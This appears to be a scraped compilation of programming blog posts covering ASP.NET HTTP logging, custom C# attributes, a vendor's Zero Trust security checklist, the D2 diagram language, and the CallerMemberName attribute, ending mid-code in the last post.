
  • HTTP Logging in ASP.NET: how to automatically log all incoming HTTP requests (and its downsides!)



    Aren’t you tired of adding manual logs to your HTTP APIs to log HTTP requests and responses? By using a built-in middleware in ASP.NET, you will be able to centralize logs management and have a clear view of all the incoming HTTP requests.


    Whenever we publish a service, it is important to add proper logging to the application. Logging helps us understand how the system works and behaves, and it’s a fundamental component that allows us to troubleshoot problems that occur during the actual usage of the application.

    In this blog, we have talked several times about logging. However, we mostly focused on the logs that were written manually.

    In this article, we will learn how to log incoming HTTP requests to help us understand how our APIs are being used from the outside.

    Scaffolding the empty project

    To showcase this type of logging, I created an ASP.NET API. It’s a very simple application with CRUD operations on an in-memory collection.

    [ApiController]
    [Route("[controller]")]
    public class BooksController : ControllerBase
    {
        private readonly List<Book> booksCatalogue = Enumerable.Range(1, 5).Select(index => new Book
        {
            Id = index,
            Title = $"Book with ID {index}"
        }).ToList();
    
        private readonly ILogger<BooksController> _logger;
    
        public BooksController(ILogger<BooksController> logger)
        {
            _logger = logger;
        }
    }
    

    These CRUD operations are exposed via HTTP APIs, following the usual verb-based convention.

    For example:

    [HttpGet("{id}")]
    public ActionResult<Book> GetBook([FromRoute] int id)
    {
        _logger.LogInformation("Looking if in my collection with {TotalBooksCount} books there is one with ID {SearchedId}"
                , booksCatalogue.Count, id);
    
        Book? book = booksCatalogue.SingleOrDefault(x => x.Id == id);
    
        return book switch
        {
            null => NotFound(),
            _ => Ok(book)
        };
    }
    

    As you can see, I have added some custom logs: before searching for the element with the specified ID, I also wrote a log message such as “Looking if in my collection with 5 books there is one with ID 2”.

    Where can I find the message? For the sake of this article, I decided to use Seq!

    Seq is a popular log sink (well, as you may know, my favourite one!), that is easy to install and to integrate with .NET. I’ve thoroughly explained how to use Seq in conjunction with ASP.NET in this article and in other ones.

    In short, the most important change in your application is to add Seq as the log sink, like this:

    builder.Services.AddLogging(lb => {
        lb.AddSeq();
    });
    

    Now, whenever I call the GET endpoint, I can see the related log messages appear in Seq:

    Custom log messages

    But sometimes it’s not enough. I want to see more details, and I want them to be applied everywhere!

    How to add HTTP Logging to an ASP.NET application

    HTTP Logging is a way of logging most of the details of the incoming HTTP operations, tracking both the requests and the responses.

    With HTTP Logging, you don’t need to manually write custom logs to access the details of incoming requests: you just need to add its related middleware, configure it as you want, and have all the required logs available for all your endpoints.

    Adding it is pretty straightforward: you first need to add the HttpLogging middleware to the list of services:

    builder.Services.AddHttpLogging(lb => { });
    

    so that you can use it once the WebApplication instance is built:
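
app.UseHttpLogging();

This is a minimal sketch of that step: UseHttpLogging is the built-in extension method that plugs the HTTP logging middleware into the request pipeline.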

There’s still a problem, though: all the logs generated via HttpLogging are, by default, ignored. They come from the Microsoft.AspNetCore.HttpLogging.HttpLoggingMiddleware category and are written at the Information log level, but the default configuration sets the Microsoft.AspNetCore namespace to Warning, so those entries get filtered out.

You either have to update the appsettings.json file to tell the logging system to process logs from that namespace:

    {
      "Logging": {
        "LogLevel": {
          "Default": "Information",
          "Microsoft.AspNetCore": "Warning",
          "Microsoft.AspNetCore.HttpLogging.HttpLoggingMiddleware": "Information"
        }
      }
    }
    

    or, alternatively, you need to do the same when setting up the logging system in the Program class:

    builder.Services.AddLogging(lb => {
      lb.AddSeq();
    + lb.AddFilter("Microsoft.AspNetCore.HttpLogging.HttpLoggingMiddleware", LogLevel.Information);
    });
    

    We then have all our pieces in place: let’s execute the application!

    First, you can spin up the API; you should be able to see the Swagger page:

Swagger page for our application’s API

    From here, you can call the GET endpoint:

    Http response of the API call, as seen on Swagger

You should now be able to see all the logs in Seq:

    Logs list in Seq

    As you can see from the screenshot above, I have a log entry for the request and one for the response. Also, of course, I have the custom message I added manually in the C# method.

    Understanding HTTP Request logs

    Let’s focus on the data logged for the HTTP request.

    If we open the log related to the HTTP request, we can see all these values:

    Details of the HTTP Request

    Among these details, we can see properties such as:

    • the host name (localhost:7164)
    • the method (GET)
    • the path (/books/4)

    and much more.

    You can see all the properties as standalone items, but you can also have a grouped view of all the properties by accessing the HttpLog element:

    Details of the HTTP Log element

Notice that for some elements we do not have access to the actual value, as the value is set to [Redacted]. This is the default configuration: it avoids disclosing sensitive values and prevents writing too much content to the log sink (the more you write, the less performant the queries become – and you also pay more!).

    Among other redacted values, you can see that even the Cookie value is not directly available – for the same reasons explained before.

    Understanding HTTP Response logs

    Of course, we can see some interesting data in the Response log:

    Details of the HTTP Response

Here, among some other properties such as the Host Name, we can see the Status Code and the Trace Id (which, as you may notice, is the same as the one in the Request).

    As you can see, the log item does not contain the body of the response.

    Also, just as it happens with the Request, we do not have access to the list of HTTP Headers.

    How to save space, storage, and money by combining log entries

    For every HTTP operation, we end up with 2 log entries: one for the Request and one for the Response.

    However, it would be more practical to have both request and response info stored in the same log item so we can understand more easily what is happening.

    Lucky for us, this functionality is already in place. We just need to set the CombineLogs property to true when we add the HttpLogging functionality:

builder.Services.AddHttpLogging(lb =>
{
+   lb.CombineLogs = true;
});
    

    Then, we are able to see the data for both the request and the related response in the same log element.

    Request and Response combined logs

    The downsides of using HTTP Logging

    Even though everything looks nice and pretty, adding HTTP Logging has some serious consequences.

First of all, remember that you are doing some extra work for every incoming HTTP request. Just processing and storing the log messages can degrade the application’s performance – you are using part of your processing resources to interpret the HTTP context, create the correct log entry, and store it.

Depending on how your APIs are structured, you may need to strip out sensitive data: HTTP Logging, by default, logs almost everything (except for the parts marked as Redacted). Since you don’t want to store the content of the requests in plain text, you may need custom logic to redact the parts of the request and response you want to hide: for instance, by implementing a custom IHttpLoggingInterceptor.
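
As a lighter alternative, you can narrow down what gets logged by configuring the built-in HttpLoggingOptions. Here is a minimal sketch (LoggingFields and the header allow-lists are standard options of the middleware; X-Correlation-Id is just a hypothetical custom header):

// requires: using Microsoft.AspNetCore.HttpLogging;
builder.Services.AddHttpLogging(options =>
{
    // Log only the fields you actually need
    options.LoggingFields = HttpLoggingFields.RequestPath
                            | HttpLoggingFields.RequestMethod
                            | HttpLoggingFields.ResponseStatusCode;

    // Headers not explicitly allow-listed keep showing up as [Redacted]
    options.RequestHeaders.Add("X-Correlation-Id"); // hypothetical custom header
    options.ResponseHeaders.Add("Content-Type");
});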

    Finally, consider that logging occupies storage, and storage has a cost. The more you log, the higher the cost. You should define proper strategies to avoid excessive storage costs while keeping valuable logs.

    Further readings

    There is a lot more, as always. In this article, I focused on the most essential parts, but the road to having proper HTTP Logs is still long.

    You may want to start from the official documentation, of course!

    🔗 HTTP logging in ASP.NET Core | Microsoft Docs

    This article first appeared on Code4IT 🐧

    All the logs produced for this article were stored on Seq. You can find more info about installing and integrating Seq in ASP.NET Core in this article:

    🔗 Easy logging management with Seq and ILogger in ASP.NET | Code4IT

    Wrapping up

    HTTP Logging can be a good tool for understanding the application behaviour and detecting anomalies. However, as you can see, there are some important downsides that need to be considered.

    I hope you enjoyed this article! Let’s keep in touch on LinkedIn or Twitter! 🤜🤛

    Happy coding!

    🐧





    Source link

• How to create Custom Attributes, and why they are useful | Code4IT




    In C#, attributes are used to describe the meaning of some elements, such as classes, methods, and interfaces.

    I’m sure you’ve already used them before. Examples are:

    • the [Required] attribute when you define the properties of a model to be validated;
    • the [Test] attribute when creating Unit Tests using NUnit;
• the [HttpGet] and the [FromBody] attributes used to define API endpoints.

As you can see, these attributes do not specify behaviour; rather, they express the meaning of a specific element.

    In this article, we will learn how to create custom attributes in C# and some possible interesting usages of such custom attributes.

    Create a custom attribute by inheriting from System.Attribute

    Creating a custom attribute is pretty straightforward: you just need to create a class that inherits from System.Attribute.

[AttributeUsage(AttributeTargets.Interface | AttributeTargets.Class | AttributeTargets.Method, AllowMultiple = true)]
public class ApplicationModuleAttribute : Attribute
{
    public Module BelongingModule { get; }

    public ApplicationModuleAttribute(Module belongingModule)
    {
        BelongingModule = belongingModule;
    }
}

public enum Module
{
    Authentication,
    Catalogue,
    Cart,
    Payment
}
    

    Ideally, the class name should end with the suffix -Attribute: in this way, you can use the attribute using the short form [ApplicationModule] rather than using the whole class name, like [ApplicationModuleAttribute]. In fact, C# attributes can be resolved by convention.

    Depending on the expected usage, a custom attribute can have one or more constructors and can expose one or more properties. In this example, I created a constructor that accepts an enum.
    I can then use this attribute by calling [ApplicationModule(Module.Cart)].

    Define where a Custom Attribute can be applied

    Have a look at the attribute applied to the class definition:

    [AttributeUsage(AttributeTargets.Interface | AttributeTargets.Class | AttributeTargets.Method, AllowMultiple = true)]
    

    This attribute tells us that the ApplicationModule can be applied to interfaces, classes, and methods.

System.AttributeTargets is an enum that lists all the kinds of elements an attribute can be attached to. The AttributeTargets enum is defined as:

[Flags]
public enum AttributeTargets
{
    Assembly = 1,
    Module = 2,
    Class = 4,
    Struct = 8,
    Enum = 16,
    Constructor = 32,
    Method = 64,
    Property = 128,
    Field = 256,
    Event = 512,
    Interface = 1024,
    Parameter = 2048,
    Delegate = 4096,
    ReturnValue = 8192,
    GenericParameter = 16384,
    All = 32767
}
    

    Have you noticed it? It’s actually a Flagged enum, whose values are powers of 2: this trick allows us to join two or more values using the OR operator.
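
For example, combining two of the values above just means setting both bits; a quick sketch using the numbers from the enum:

// Class = 4 and Method = 64: OR-ing them yields 68, with both bits set,
// so the attribute is allowed both on classes and on methods.
AttributeTargets targets = AttributeTargets.Class | AttributeTargets.Method;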

There’s another property to notice: AllowMultiple. When set to true, this property tells us that it’s possible to apply more than one attribute of the same type to the same element, like this:

    [ApplicationModule(Module.Cart)]
    [ApplicationModule(Module.Catalogue)]
    public class ItemDetailsService { }
    

    Or, if you want, you can inline them:

    [ApplicationModule(Module.Cart), ApplicationModule(Module.Catalogue)]
    public class ItemDetailsService { }
    

    Practical usage of Custom Attributes

    You can use custom attributes to declare which components or business areas an element belongs to.

In the previous example, I defined an enum that lists all the business modules supported by my application:

    public enum Module
    {
        Authentication,
        Catalogue,
        Cart,
        Payment
    }
    

    This way, whenever I define an interface, I can explicitly tell which components it belongs to:

    [ApplicationModule(Module.Catalogue)]
    public interface IItemDetails
    {
        [ApplicationModule(Module.Catalogue)]
        string ShowItemDetails(string itemId);
    }
    
    [ApplicationModule(Module.Cart)]
    public interface IItemDiscounts
    {
        [ApplicationModule(Module.Cart)]
        bool CanHaveDiscounts(string itemId);
    }
    

    Not only that: I can have one single class implement both interfaces and mark it as related to both the Catalogue and the Cart areas.

    [ApplicationModule(Module.Cart)]
    [ApplicationModule(Module.Catalogue)]
    public class ItemDetailsService : IItemDetails, IItemDiscounts
    {
        [ApplicationModule(Module.Catalogue)]
        public string ShowItemDetails(string itemId) => throw new NotImplementedException();
    
        [ApplicationModule(Module.Cart)]
        public bool CanHaveDiscounts(string itemId) => throw new NotImplementedException();
    }
    

    Notice that I also explicitly enriched the two inner methods with the related attribute – even if it’s not necessary.

    Further readings

As you noticed, AttributeTargets is a Flagged Enum. Not sure what Flagged Enums are and how to define them? I’ve got you covered! I wrote two articles about Enums, and you can find info about Flagged Enums in both:

    🔗 5 things you should know about enums in C# | Code4IT

    and
    🔗 5 more things you should know about enums in C# | Code4IT

    This article first appeared on Code4IT 🐧

    There are some famous but not-so-obvious examples of attributes that you should know: DebuggerDisplay and InternalsVisibleTo.

    DebuggerDisplay can be useful for improving your debugging sessions.

    🔗 Simplify debugging with DebuggerDisplay attribute dotNET | Code4IT

InternalsVisibleTo can be used to give external projects access to internal classes; for example, you can use that attribute when writing unit tests.

    🔗 Testing internal members with InternalsVisibleTo | Code4IT

    Wrapping up

    In this article, I showed you how to create custom attributes in C# to specify which modules a class or a method belongs to. This trick can be useful if you want to speed up the analysis of your repository: if you need to retrieve all the classes that are used for the Cart module (for example, because you want to move them to an external library), you can just search for Module.Cart across the repository and have a full list of elements.

    In particular, this approach can be useful for the exposed components, such as API controllers. Knowing that two or more modules use the same Controller can help you understand if a change in the API structure is necessary.

Another good usage of this attribute is automatic documentation: you could create a tool that automatically lists all the interfaces, API endpoints, and classes grouped by the belonging module. The possibilities are infinite!
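
As a minimal sketch of such a tool (assuming the ApplicationModuleAttribute and Module types defined above, and scanning only the current assembly), you could group the decorated types via reflection:

using System.Linq;
using System.Reflection;

var typesByModule = Assembly.GetExecutingAssembly()
    .GetTypes()
    .SelectMany(type => type
        .GetCustomAttributes<ApplicationModuleAttribute>()
        .Select(attribute => (Module: attribute.BelongingModule, Type: type)))
    .GroupBy(entry => entry.Module);

foreach (var group in typesByModule)
{
    Console.WriteLine($"Module: {group.Key}");

    foreach (var entry in group)
    {
        Console.WriteLine($" - {entry.Type.Name}");
    }
}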

    I hope you enjoyed this article! Let’s keep in touch on LinkedIn, Twitter or BlueSky! 🤜🤛

    Happy coding!

    🐧





    Source link

  • Zero Trust Best Practices for Enterprises and Businesses


    Cybersecurity threats are becoming more sophisticated and frequent in today’s digital landscape. Whether a large enterprise or a growing small business, organizations must pivot from traditional perimeter-based security models to a more modern, robust approach—Zero Trust Security. At its core, Zero Trust operates on a simple yet powerful principle: never trust, always verify.

    Implementing Zero Trust is not a one-size-fits-all approach. It requires careful planning, integration of the right technologies, and ongoing management. Here are some key zero trust best practices to help both enterprises and small businesses establish a strong zero-trust foundation:

    1. Leverage IAM and AD Integrations

    A successful Zero-Trust strategy begins with Identity and Access Management (IAM). Integrating IAM solutions with Active Directory (AD) or other identity providers helps centralize user authentication and enforce policies more effectively. These integrations allow for a unified view of user roles, permissions, and access patterns, essential for controlling who gets access to what and when.

    IAM and AD integrations also enable seamless single sign-on (SSO) capabilities, improving user experience while ensuring access control policies are consistently applied across your environment.

    If your organization does not have an IdP or AD, choose a ZT solution with a User Management feature for Local Users.

2. Ensure Zero Trust for Both On-Prem and Remote Users

    Gone are the days when security could rely solely on protecting the corporate network perimeter. With the rise of hybrid work models, extending zero-trust principles beyond traditional office setups is critical. This means ensuring that both on-premises and remote users are subject to the same authentication, authorization, and continuous monitoring processes.

    Cloud-native Zero Trust Network Access (ZTNA) solutions help enforce consistent policies across all users, regardless of location or device. This is especially important for businesses with distributed teams or those who rely on contractors and third-party vendors.

3. Implement MFA for All Users for Enhanced Security

    Multi-factor authentication (MFA) is one of the most effective ways to protect user identities and prevent unauthorized access. By requiring at least two forms of verification, such as a password and a one-time code sent to a mobile device, MFA dramatically reduces the risk of credential theft and phishing attacks.

    MFA should be mandatory for all users, including privileged administrators and third-party collaborators. It’s a low-hanging fruit that can yield high-security dividends for organizations of all sizes.

4. Ensure Proper Device Posture Rules

    Zero Trust doesn’t stop at verifying users—it must also verify their devices’ health and security posture. Whether it’s a company-issued laptop or a personal mobile phone, devices should meet specific security criteria before being granted access to corporate resources.

    This includes checking for up-to-date antivirus software, secure OS configurations, and encryption settings. By enforcing device posture rules, businesses can reduce the attack surface and prevent compromised endpoints from becoming a gateway to sensitive data.

5. Adopt Role-Based Access Control

    Access should always be granted on a need-to-know basis. Implementing Role-Based Access Control (RBAC) ensures that users only have access to the data and applications required to perform their job functions, nothing more, nothing less.

    This minimizes the risk of internal threats and lateral movement within the network in case of a breach. For small businesses, RBAC also helps simplify user management and audit processes, primarily when roles are clearly defined, and policies are enforced consistently.

6. Regularly Review and Update Policies

Zero Trust is not a one-time setup; it’s a continuous process. As businesses evolve, so do user roles, devices, applications, and threat landscapes. That’s why it’s essential to review and update your security policies regularly.

    Conduct periodic audits to identify outdated permissions, inactive accounts, and policy misconfigurations. Use analytics and monitoring tools to assess real-time risk levels and fine-tune access controls accordingly. This iterative approach ensures that your Zero Trust architecture remains agile and responsive to emerging threats.

    Final Thoughts

Zero Trust is more than just a buzzword; it’s a strategic shift that aligns security with modern business realities. Adopting these zero trust best practices can help you build a more resilient and secure IT environment, whether you are a large enterprise or a small business.

    By focusing on identity, device security, access control, and continuous policy refinement, organizations can reduce risk exposure and stay ahead of today’s ever-evolving cyber threats.

    Ready to take the next step in your Zero Trust journey? Start with what you have, plan for what you need, and adopt a security-first mindset across your organization.

    Embrace the Seqrite Zero Trust Access Solution and create a secure and resilient environment for your organization’s digital assets. Contact us today.

     



    Source link

• like Mermaid, but better. Syntax, installation, and practical usage tips | Code4IT



    D2 is an open-source tool to design architectural layouts using a declarative syntax. It’s a textual format, which can also be stored under source control. Let’s see how it works, how you can install it, and some practical usage tips.


When defining the architecture of a system, I believe in the adage «A picture is worth a thousand words».

    Proper diagramming helps in understanding how the architecture is structured, the dependencies between components, how the different components communicate, and their responsibilities.

    A clear architectural diagram can also be useful for planning. Once you have a general idea of the components, you can structure the planning according to the module dependencies and the priorities.

    A lack of diagramming leads to a “just words” definition: how many times have you heard people talk about modules that do not exist or do not work as they were imagining?

    The whole team can benefit from having a common language: a clear diagram brings clear thoughts, helping all the stakeholders (developers, architects, managers) understand the parts that compose a system.

I tried several approaches: both online WYSIWYG tools, like Draw.IO, and DSLs, like Structurizr and Mermaid. For different reasons, I wasn’t happy with any of them.

    Then I stumbled upon D2: its rich set of elements makes it my new go-to tool for describing architectures. Let’s see how it works!

    A quick guide to D2 syntax

    Just like the more famous Mermaid, when using D2, you have to declare all the elements and connections as textual nodes.

    You can generate diagrams online by using the Playground section available on the official website, or you can install it locally (as you will see later).

    Elements: the basic components of every diagram

    Elements are defined as a set of names that can be enriched with a label and other metadata.

    Here’s an example of the most straightforward configurations for standalone elements.

    service
    
    user: Application User
    
    job: {
      shape: hexagon
    }
    

    For each element, you can define its internal name (service), a label (user: Application User) and a shape (shape: hexagon).

    A simple diagram with only two unrelated elements

    Other than that, I love the fact that you can define elements to be displayed as multiple instances: this can be useful when a service has multiple instances of the same type, and you want to express it clearly without the need to manually create multiple elements.

    You can do it by setting the multiple property to true.

    apiGtw: API Gateway {
      shape: cloud
    }
    be: BackEnd {
      style.multiple: true
    }
    
    apiGtw -> be
    

    Simple diagram with multiple backends

    Grouping: nesting elements hierarchically

    You may want to group elements. You can do that by using a hierarchical structure.

    In the following example, the main container represents my e-commerce application, composed of a website and a background job. The website is composed of a frontend, a backend, and a database.

    ecommerce: E-commerce {
      website: User Website {
        frontend
        backend
        database: DB {
          shape: cylinder
        }
      }
    
      job: {
        shape: hexagon
      }
    }
    

    As you can see from the diagram definition, elements can be nested in a hierarchical structure using the {} symbols. Of course, you can still define styles and labels to nested elements.

    Diagram with nested elements

    Connections: making elements communicate

    An architectural diagram is helpful only if it can express connections between elements.

    To connect two elements, you must use the --, the -> or the <- connector. You have to link their IDs, not their labels.

ecommerce: E-commerce {
  website: User Website {
    frontend
    backend
    database: DB {
      shape: cylinder
    }
    frontend -> backend
    backend -> database: retrieve records {
      style.stroke: red
    }
  }

  job: {
    shape: hexagon
  }
  job -> website.database: update records
}
    

    The previous example contains some interesting points.

    • Elements within the same container can be referenced directly using their ID: frontend -> backend.
    • You can add labels to a connection: backend -> database: retrieve records.
    • You can apply styles to a connection, like choosing the arrow colour with style.stroke: red.
    • You can create connections between elements from different containers: job -> website.database.

    Connections between elements from different containers

    When referencing items from different containers, you must always include the container ID: job -> website.database works, but job -> database doesn’t because database is not defined (so it gets created from scratch).

    SQL Tables: represent the table schema

    An interesting part of D2 diagrams is the possibility of adding the description of SQL tables.

    Obviously, the structure cannot be validated: the actual syntax depends on the database vendor.

    However, having the table schema defined in the diagram can be helpful in reasoning around the dependencies needed to complete a development.

    serv: Products Service
    
    db: Database Schema {
      direction: right
      shape: cylinder
      userTable: dbo.user {
        shape: sql_table
        Id: int {constraint: primary_key}
        FirstName: text
        LastName: text
        Birthday: datetime2
      }
    
      productsTable: dbo.products {
        shape: sql_table
        Id: int {constraint: primary_key}
        Owner: int {constraint: foreign_key}
        Description: text
      }
    
      productsTable.Owner -> userTable.Id
    }
    
    serv -> db.productsTable: Retrieve products by user id
    

    Diagram with database tables

    Notice how you can also define constraints to an element, like {constraint: foreign_key}, and specify the references from one table to another.

    How to install and run D2 locally

    D2 is a tool written in Go.

Go is not natively present on every computer, so you have to install it. You can learn how to install it from the official page.

    Once Go is ready, you can install D2 in several ways. I use Windows 11, so my preferred installation approach is to use a .msi installer, as described here.

    If you are on macOS, you can use Homebrew to install it by running:
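
brew install d2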

    Regardless of the Operating System, you can have Go directly install D2 by running the following command:

    go install oss.terrastruct.com/d2@latest
    

    It’s even possible to install it via Docker. However, this approach is quite complex, so I prefer installing D2 directly with the other methods I explained before.

    You can find more information about the several installation approaches on the GitHub page of the project.

    Use D2 via command line

    To work with D2 diagrams, you need to create a file with the .d2 extension. That file will contain the textual representation of the diagrams, following the syntax we saw before.

Once D2 is installed and the file is present in the file system (in my case, I named the file my-diagram.d2), you can use the console to generate the diagram locally – remember, I’m using Windows 11, so I need to run the exe file:

    d2.exe --watch .\my-diagram.d2
    

    Now you can open your browser, head to the localhost page displayed on the shell, and see how D2 renders the local file. Thanks to the --watch flag, you can update the file locally and see the result appear on the browser without the need to restart the application.

    When the diagram is ready, you can export it as a PNG or SVG by running

    d2.exe .\my-diagram.d2 my-wonderful-design.png
    

    Create D2 Diagrams on Visual Studio Code

    Another approach is to install the D2 extension on VS Code.

    D2 extension on Visual Studio Code

    Thanks to this extension, you can open any D2 file and, by using the command palette, see a preview of the final result. You can also format the document to have the diagram definition tidy and well-structured.

    D2 extension command palette

    How to install and use D2 Diagrams on Obsidian

    Lastly, D2 can be easily integrated with tools like Obsidian. Among the community plugins, you can find the official D2 plugin.

    D2 plugin for Obsidian

    As you can imagine, Go is required on your machine.
    And, if necessary, you are required to explicitly set the path to the bin folder of Go. In my case, I had to set it to C:\Users\BelloneDavide\go\bin\.

    D2 plugin settings for Obsidian

    To insert a D2 diagram in a note generated with Obsidian, you have to use d2 as a code fence language.

    Practical tips for using D2

    D2 is easy to use once you have a basic understanding of how to create elements and connections.

    However, some tips may be useful to ease the process of creating the diagrams. Or, at least, these tips helped me write and maintain my diagrams.

    Separate elements and connections definition

A good approach is to declare the application’s structure first, and then list all the connections between elements, unless the elements belong to the same component and are not expected to change.

    ecommerce: E-commerce {
      website: User Website {
        backend
        database: DB {
          shape: cylinder
        }
    
        backend -> database: retrieve records {
          style.stroke: red
        }
      }
    
      job -> website.database: update records
    }
    

    Here, the connection between backend and database is internal to the website element, so it makes sense to declare it directly within the website element.

    However, the other connection between the job and the database is cross-element. In the long run, it may bring readability problems.

    So, you could update it like this:

ecommerce: E-commerce {
  website: User Website {
    backend
    database: DB {
      shape: cylinder
    }

    backend -> database: retrieve records {
      style.stroke: red
    }
  }

- job -> website.database: update records
}

+ ecommerce.job -> ecommerce.website.database: update records
    

    This tip can be extremely useful when you have more than one element with the same name belonging to different parents.

    Needless to say, since the order of the connection declarations does not affect the final rendering, write them in an organized way that best fits your needs. In general, I prefer creating sections (using comments to declare the area), and grouping connections by the outbound module.

    Pick a colour theme (and customize it, if you want!)

    D2 allows you to specify a theme for the diagram. There are some predefined themes (which are a set of colour palettes), each with a name and an ID.

    To use a theme, you have to specify it in the vars element on top of the diagram:

    vars: {
      d2-config: {
        theme-id: 103
      }
    }
    

    103 is the theme named “Earth tones”, using a brown-based palette that, when applied to the diagram, renders it like this.

    Diagram using the 103 colour palette

    However, if you have a preferred colour palette, you can use your own colours by overriding the default values:

    vars: {
      d2-config: {
        # Terminal theme code
        theme-id: 103
        theme-overrides: {
          B4: "#C5E1A5"
        }
      }
    }
    

    Diagram with a colour overridden

    You can read more about themes and customizations here.

    What is that B4 key overridden in the previous example? Unfortunately, I don’t know: you must try all the variables to understand how the diagram is rendered.

    Choose the right layout engine

    You can choose one of the three supported layout engines to render the elements in a different way (more info here).

    DAGRE and ELK are open source, but quite basic. TALA is more sophisticated, but it requires a paid licence.

    Here’s an example of how the same diagram is rendered using the three different engines.

A comparison between the DAGRE, ELK and TALA layout engines

    You can decide which engine to use by declaring it in the layout-engine element:

    vars: {
      d2-config: {
        layout-engine: tala
      }
    }
    

    Choosing the right layout engine can be beneficial because sometimes some elements are not rendered correctly: here’s a weird rendering with the DAGRE engine.

    DAGRE engine with a weird rendering

    Use variables to simplify future changes

    D2 allows you to define variables in a single place and have the same value repeated everywhere it’s needed.

    So, for example, instead of having

    mySystem: {
      reader: Magazine Reader
      writer: Magazine Writer
    }
    

Since the word “Magazine” is repeated, you can move it to a variable, so that it can easily be changed in the future:

    vars: {
      entityName: Magazine
    }
    
    mySystem: {
      reader: ${entityName} Reader
      writer: ${entityName} Writer
    }
    

If, in the future, you have to handle not only Magazines but also other media types, you can simply replace the value of entityName in one place and have it updated all over the diagram.

    D2 vs Mermaid: a comparison

    D2 and Mermaid are similar but have some key differences.

They are both diagram-as-code tools, meaning that the definition of a diagram is expressed as a text file, thus making it available under source control.

    Mermaid is already supported by many tools, like Azure DevOps wikis, GitHub pages, and so on.
    On the contrary, D2 must be installed (along with the Go language).

Mermaid is quite a “closed” system: even if it allows you to define some basic styles, it’s not that flexible.

    On the contrary, D2 allows you to choose a theme for the whole diagram, as well as choosing different layout engines.
Also, D2 has some functionalities that are (currently) missing on Mermaid.

    Mermaid, on the contrary, allows us to define more types of diagrams: State Diagrams, Gantt, Mindmaps, and so on. Also, as we saw, it’s already supported on many platforms.

    So, my (current) choice is: use D2 for architectural diagrams, and use Mermaid for everything else.

    I haven’t tried D2 for Sequence Diagrams yet, so I won’t express an opinion on that.

    Further readings

    D2 is available online with a playground you can use to try things out in a sandboxed environment.

    🔗 D2 Playground

    All the documentation can be found on GitHub or on the official website:

    🔗 D2 documentation

    And, if you want, you can use icons to create better diagrams: D2 exposes a set of SVG icons that can be easily integrated into your diagrams. You can find them here:

    🔗 D2 predefined icons

    This article first appeared on Code4IT 🐧

    Ok, but diagrams have to live in a context. How can you create useful and maintainable documentation for your future self?

    A good way to document your architectural choices is to define ADRs (Architecture Decision Records), as explained here:

    🔗 Tracking decision with Architecture Decision Records (ADRs) | Code4IT

    And, of course, just the architectural diagram is not enough: you should also describe the dependencies, the constraints, the deployment strategies, and so on. Arc42 is a template that can guide you to proper system documentation:

    🔗 Arc42 Documentation, for a comprehensive description of your project | Code4IT

    Wrapping up

    I hope you enjoyed this article! Let’s keep in touch on LinkedIn, Twitter or BlueSky! 🤜🤛

    Happy coding!

    🐧





    Source link

• An In-Depth Look at CallerMemberName (and some Compile-Time trivia) | Code4IT



    Let’s dive deep into the CallerMemberName attribute and explore its usage from multiple angles. We’ll see various methods of invoking it, shedding light on how it is defined at compile time.


Method names change. And if you are using method names in some places, specifying them manually, you’ll spend a lot of time updating them.

    Luckily for us, in C#, we can use an attribute named CallerMemberName.

This attribute can be applied to a parameter in the method signature so that, unless the caller passes an explicit value, its value is the caller method’s name.

public void SayMyName([CallerMemberName] string? methodName = null) =>
  Console.WriteLine($"The method name is {methodName ?? "NULL"}!");
    

It’s important to note that the parameter must be optional (here, a nullable string with a null default): this way, if the caller sets its value, that value is used. Otherwise, the name of the caller method is used. Well, if the caller method has a name! 👀

    Getting the caller method’s name via direct execution

    The easiest example is the direct call:

    private void DirectCall()
    {
      Console.WriteLine("Direct call:");
      SayMyName();
    }
    

    Here, the method prints:

    Direct call:
    The method name is DirectCall!
    

    In fact, we are not specifying the value of the methodName parameter in the SayMyName method, so it defaults to the caller’s name: DirectCall.

    CallerMemberName when using explicit parameter name

    As we already said, we can specify the value:

    private void DirectCallWithOverriddenName()
    {
      Console.WriteLine("Direct call with overridden name:");
      SayMyName("Walter White");
    }
    

    Prints:

    Direct call with overridden name:
    The method name is Walter White!
    

    It’s important to note that the compiler sets the methodName parameter only if it is not otherwise specified.

    This means that if you call SayMyName(null), the value will be null – because you explicitly declared the value.

    private void DirectCallWithNullName()
    {
      Console.WriteLine("Direct call with null name:");
      SayMyName(null);
    }
    

    The printed text is then:

    Direct call with null name:
    The method name is NULL!
    

    CallerMemberName when the method is called via an Action

    Let’s see what happens when calling it via an Action:

    public void CallViaAction()
    {
      Console.WriteLine("Calling via Action:");
    
      Action<int> action = (_) => SayMyName();
      var singleElement = new List<int> { 1 };
      singleElement.ForEach(s => action(s));
    }
    

    This method prints this text:

    Calling via Action:
    The method name is CallViaAction!
    

Now, things get interesting: the CallerMemberName attribute picks up the name of the method that contains the overall expression, not the immediate syntactic caller.

    We can see that, syntactically, the caller is the ForEach method (which is a method of the List<T> class). But, in the final result, the ForEach method is ignored, as the method is actually called by the CallViaAction method.

    This can be verified by accessing the compiler-generated code, for example by using Sharplab.

    Compiled code of Action with pre-set method name

At compile time, since no value is passed to the SayMyName method, it gets auto-populated with the parent method’s name. Then, the ForEach method calls SayMyName, but the methodName is already defined at compile time.
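
Conceptually, it is as if the compiler had rewritten the lambda with the name already baked in (a simplified sketch, not the exact generated code):

Action<int> action = (_) => SayMyName("CallViaAction");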

    Lambda executions and the CallerMemberName attribute

    The same behaviour occurs when using lambdas:

    private void CallViaLambda()
    {
      Console.WriteLine("Calling via lambda expression:");
    
      void lambdaCall() => SayMyName();
      lambdaCall();
    }
    

    The final result prints out the name of the caller method.

    Calling via lambda expression:
    The method name is CallViaLambda!
    

    Again, the magic happens at compile time:

    Compiled code for a lambda expression

    The lambda is compiled into this form:

    [CompilerGenerated]
    private void <CallViaLambda>g__lambdaCall|0_0()
    {
      SayMyName("CallViaLambda");
    }
    

This makes the parent method’s name available.

    CallerMemberName when invoked from a Dynamic type

    What if we try to execute the SayMyName method by accessing the root class (in this case, CallerMemberNameTests) as a dynamic type?

    private void CallViaDynamicInvocation()
    {
      Console.WriteLine("Calling via dynamic invocation:");
    
      dynamic dynamicInstance = new CallerMemberNameTests(null);
      dynamicInstance.SayMyName();
    }
    

Oddly enough, the attribute does not work as we could have expected: it prints NULL:

    Calling via dynamic invocation:
    The method name is NULL!
    

    This happens because, at compile time, there is no reference to the caller method.

    private void CallViaDynamicInvocation()
    {
      Console.WriteLine("Calling via dynamic invocation:");
      
      object arg = new C();
      if (<>o__0.<>p__0 == null)
      {
        Type typeFromHandle = typeof(C);
        CSharpArgumentInfo[] array = new CSharpArgumentInfo[1];
        array[0] = CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.None, null);
